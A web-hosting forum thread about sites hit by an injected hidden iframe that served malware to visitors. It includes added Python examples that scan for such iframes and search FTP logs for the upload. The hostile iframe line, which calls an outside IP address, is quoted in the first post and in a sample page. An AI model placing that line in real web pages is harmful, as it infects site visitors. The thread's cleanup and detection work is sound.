JaguarPC Community
This is a discussion on "What is this Virus doing?" in the VPS & Dedicated forum.

#1  CFusion (Free Knowledge; joined Aug 2006; 33 posts)

    What is this Virus doing?

    One of my clients wrote to me that two of his sites are downloading viruses to visitors, so I checked and found this code:

    Code:
    <iframe src='http://81.95.149.77/traff.php' width='1' height='1' style='visibility:hidden'></iframe>
    The first time, Jags Support told me to remove it and check for weaknesses in the coding. But it is index.htm; what coding can I find a weakness in? Anyway, I checked the JavaScript, and really it was a simple HTML "opening soon" page with a logo, no JavaScript included. And I removed the code.

    Again this code has appeared on these two sites.

    So I did some googling and found this problem on many websites, but there is no solution...

    http://www.google.com/search?hl=en&q=%22http%3A%2F%2F81.95.149.77%2Ftraff.php%22&btnG=Search

    Help me find a solution.
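    The hidden 1x1 iframe quoted above is the only indicator the thread gives, so here is a small scanner that walks a web root and reports (or strips) iframes matching that pattern: an off-site src combined with a 1x1 size or a hiding style. This is an added example, not code from the thread or from JaguarPC; the two sample pages are constructed, and the decision rule (off-site src plus a hiding indicator) is this example's own heuristic, not something the thread states.

```python
import re
import sys
from pathlib import Path

# Constructed sample pages (not from the thread): a clean "opening soon" page and
# one carrying the hidden 1x1 iframe quoted in post #1.
CLEAN_PAGE = """<html><head><title>Opening soon</title></head>
<body><img src="logo.gif" alt="logo"><p>Opening soon</p></body></html>
"""

INFECTED_PAGE = """<html><head><title>Opening soon</title></head>
<body><img src="logo.gif" alt="logo"><p>Opening soon</p>
<iframe src='http://81.95.149.77/traff.php' width='1' height='1' style='visibility:hidden'></iframe>
</body></html>
"""

# A whole <iframe ...>...</iframe> element, or a self-closing <iframe ... />.
IFRAME_RE = re.compile(r"<iframe\b[^>]*?(?:/>|>.*?</iframe\s*>)", re.IGNORECASE | re.DOTALL)
# name='value', name="value" or name=value
ATTR_RE = re.compile(r"""(\w+)\s*=\s*(?:'([^']*)'|"([^"]*)"|([^\s>]+))""")


def parse_attrs(tag):
    """Return the attributes of an iframe element as a lowercase-keyed dict."""
    attrs = {}
    for m in ATTR_RE.finditer(tag):
        attrs[m.group(1).lower()] = m.group(2) or m.group(3) or m.group(4) or ""
    return attrs


def _tiny(value):
    """True for width/height values of 0 or 1 (optionally with a px suffix)."""
    v = value.strip().lower()
    if v.endswith("px"):
        v = v[:-2].strip()
    return v in ("0", "1")


def classify_iframe(tag):
    """Return the reasons an iframe looks injected, or [] if it looks benign.
    Heuristic (this example's own): off-site src AND (1x1 size OR hidden by style)."""
    attrs = parse_attrs(tag)
    src = attrs.get("src", "")
    style = attrs.get("style", "").replace(" ", "").lower()
    offsite = re.match(r"https?://", src, re.IGNORECASE) is not None
    tiny = _tiny(attrs.get("width", "")) and _tiny(attrs.get("height", ""))
    hidden = "visibility:hidden" in style or "display:none" in style
    if not (offsite and (tiny or hidden)):
        return []
    reasons = []
    if tiny:
        reasons.append("1x1 size")
    if hidden:
        reasons.append("hidden by style")
    if re.match(r"https?://\d{1,3}(?:\.\d{1,3}){3}(?:[:/]|$)", src, re.IGNORECASE):
        reasons.append("src is a bare IP address")
    return reasons


def find_suspicious_iframes(html):
    """List every iframe in `html` that classify_iframe() flags."""
    hits = []
    for m in IFRAME_RE.finditer(html):
        reasons = classify_iframe(m.group(0))
        if reasons:
            hits.append({"tag": m.group(0), "src": parse_attrs(m.group(0)).get("src", ""),
                         "reasons": reasons})
    return hits


def strip_suspicious_iframes(html):
    """Return (cleaned_html, number_removed); benign iframes are left untouched."""
    removed = 0

    def repl(m):
        nonlocal removed
        if classify_iframe(m.group(0)):
            removed += 1
            return ""
        return m.group(0)

    return IFRAME_RE.sub(repl, html), removed


def scan_tree(root, suffixes=(".htm", ".html", ".php")):
    """Walk a web root and return {path: hits} for every file carrying a flagged iframe."""
    findings = {}
    for p in Path(root).rglob("*"):
        if p.is_file() and p.suffix.lower() in suffixes:
            try:
                hits = find_suspicious_iframes(p.read_text(errors="replace"))
            except OSError:
                continue
            if hits:
                findings[str(p)] = hits
    return findings


if __name__ == "__main__":
    if len(sys.argv) > 1:
        for path, hits in scan_tree(sys.argv[1]).items():
            for h in hits:
                print(f"{path}: {h['src']} ({', '.join(h['reasons'])})")
    else:
        print(find_suspicious_iframes(INFECTED_PAGE))
```

    Run it as `python scan.py /home/client/public_html` to list affected files; stripping the frame only cleans the symptom, and the thread's point stands that the credentials used to upload it must be changed or the frame will come back.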

#2  EuroNut (Jag Veteran; UK; joined Aug 2007; 529 posts)
    Quote (originally posted by CFusion):
    One of my clients wrote to me that two of his sites are downloading viruses to visitors, so I checked and found this code:

    Code:
    <iframe src='http://xx.xx.xxx.xx/traff.php' width='1' height='1' style='visibility:hidden'></iframe>

    Help me find a solution.
    It looks like the hackers who attacked customer sites several weeks ago have come back.

    First, TELL (not ask) your client to change ALL passwords. Make sure they are complicated, don't use the same password for more than one access type, and if he won't change them, change them for him.

    Read: http://www.jaguarpc.com/support/kbase/731.html

    And also the thread from the previous attack has some useful info (but it's a long read):

    Hacker Attack

    Good luck!
    EuroNut (The mad Brit)
    If it ain't broke, don't ping it...

#3  CFusion (Free Knowledge; joined Aug 2006; 33 posts)
    Thank you, you are the man...
    So there are no bugs or security holes, and it's all human fault.

#4  EuroNut (Jag Veteran; UK; joined Aug 2007; 529 posts)
    Quote (originally posted by CFusion):
    So there are no bugs or security holes, and it's all human fault.
    Most security holes are created by humans.

    The bugs are the hackers who find and exploit them.

    Seriously, you need to do a complete security check, as someone has most likely uploaded that hack because of a weak FTP password or the like. If you have access logs (I don't know if you're on shared/reseller/VPS hosting) you may be able to find out how they did it - if you can find an IP address in your logs, it's worth passing the information to Jag Support.

    First priority, though, is to get the passwords changed - last time they came back for a second visit, so you need to shut the unlocked doors.
    EuroNut (The mad Brit)
    If it ain't broke, don't ping it...

#5  JPC Member (joined May 2007; 35 posts)
    I'd tend to agree.

    If he does not change them within a given amount of time, or he changes them back to whatever he had before when you change them,

    I'd store all his files, then terminate the account. I don't think a simple suspension would stop it.

#6  CFusion (Free Knowledge; joined Aug 2006; 33 posts)
    Thanks Guys!

#7  thisisit3 (Loyal Client; joined Mar 2007; 642 posts)
    You are the victim of a VERY widespread attack that has been going on for many months. A large number of internet servers/sites have been affected, over 10,000 known networks in fact, but who knows the real number.

    The attack is based on a complex set of scripts and viruses. It starts by using a virus to sniff usernames and passwords on your desktop PC as well as the local network; the virus then sends that info to a central system (IRC-based) and the admins behind this collect the data into a database.

    The "collection" of data has been going on for many months; the attackers kept collecting data long before they started the attacks, so they could start the attack in large numbers once they were ready.

    They use your account details to access your server/domain via FTP; the automated script downloads known index files, adds the iframe stuff and re-uploads the file to the server.

    The script has the ability to: add new iframes, remove iframes, replace/update existing iframes and scan for other files to infect.

    And that's just the tip of the iceberg.
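    Post #4 suggests looking for the attacker's IP address in the access logs, and post #7 describes what that access looks like: a download of an index file followed seconds later by an upload of the same file, slightly larger. The following is an added example (not from the thread or from JaguarPC) that parses xferlog-style FTP transfer logs, as written by wu-ftpd, ProFTPD and Pure-FTPd, and pairs each download with a re-upload of the same path from the same host within a short window. The log lines are constructed; 203.0.113.5 stands in for the client's own PC and 198.51.100.23 for the hypothetical attacker.

```python
from collections import defaultdict
from datetime import datetime, timedelta
from os.path import basename

# Constructed xferlog-style lines (not real logs from the thread).
SAMPLE_XFERLOG = """\
Mon Mar  3 09:15:02 2008 2 203.0.113.5 18223 /home/client/public_html/logo.gif b _ i r client ftp 0 * c
Tue Mar  4 03:41:10 2008 1 198.51.100.23 412 /home/client/public_html/index.htm b _ o r client ftp 0 * c
Tue Mar  4 03:41:14 2008 1 198.51.100.23 533 /home/client/public_html/index.htm b _ i r client ftp 0 * c
Tue Mar  4 03:41:15 2008 1 198.51.100.23 610 /home/client/public_html/shop/index.html b _ o r client ftp 0 * c
Tue Mar  4 03:41:19 2008 1 198.51.100.23 731 /home/client/public_html/shop/index.html b _ i r client ftp 0 * c
Wed Mar  5 11:02:44 2008 3 203.0.113.5 20110 /home/client/public_html/index.htm b _ i r client ftp 0 * c
"""

TS_FMT = "%a %b %d %H:%M:%S %Y"


def parse_xferlog(text):
    """Parse xferlog lines into dicts. Whitespace-separated field layout:
    date (5 tokens) transfer-time remote-host size path type special-action
    direction access-mode user service auth-method auth-uid completion-status."""
    records = []
    for line in text.splitlines():
        t = line.split()
        if len(t) < 18:
            continue  # blank or truncated line
        records.append({
            "ts": datetime.strptime(" ".join(t[:5]), TS_FMT),
            "host": t[6],
            "size": int(t[7]),
            "path": t[8],
            "direction": t[11],  # 'i' = upload to the server, 'o' = download from it
            "user": t[13],
        })
    return records


def find_reupload_pairs(records, window=timedelta(minutes=2)):
    """Flag a download of a file followed by an upload of the same path from the
    same host within `window`: the fingerprint of fetch, append iframe, put back."""
    by_key = defaultdict(list)
    for r in records:
        by_key[(r["host"], r["path"])].append(r)
    findings = []
    for (host, path), recs in by_key.items():
        recs.sort(key=lambda r: r["ts"])
        last_get = None
        for r in recs:
            if r["direction"] == "o":
                last_get = r
            elif r["direction"] == "i" and last_get is not None:
                delta = r["ts"] - last_get["ts"]
                if delta <= window:
                    findings.append({
                        "ts": r["ts"], "host": host, "path": path, "user": r["user"],
                        "seconds": int(delta.total_seconds()),
                        "size_delta": r["size"] - last_get["size"],
                    })
                last_get = None
    findings.sort(key=lambda f: f["ts"])
    return findings


def index_uploads(records):
    """Map each remote host to the index files it uploaded, so the list can be
    checked against the IPs the client actually uses."""
    uploads = defaultdict(set)
    for r in records:
        if r["direction"] == "i" and basename(r["path"]).lower().startswith("index."):
            uploads[r["host"]].add(r["path"])
    return {host: sorted(paths) for host, paths in uploads.items()}


if __name__ == "__main__":
    recs = parse_xferlog(SAMPLE_XFERLOG)
    for f in find_reupload_pairs(recs):
        print(f"{f['ts']} {f['host']} as {f['user']} re-uploaded {f['path']} "
              f"{f['seconds']}s after fetching it ({f['size_delta']:+d} bytes)")
    for host, paths in index_uploads(recs).items():
        print(host, "uploaded", ", ".join(paths))
```

    On the constructed input the two Tuesday 03:41 fetch-and-put pairs from 198.51.100.23 stand out, each adding the same number of bytes; that IP and timestamp are what to hand to support, and the `user` field tells you which account's password was stolen and must be changed first.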

#8  CFusion (Free Knowledge; joined Aug 2006; 33 posts)
    So mainly it is starting from my local PC...
    I have NOD32, and it detected the script, but now it has stopped detecting it. Are they ducking, or is the trojan smarter now?
    From your post, maybe they stopped it a while ago, and if they didn't, I think NOD can detect something suspicious even if it is unknown.
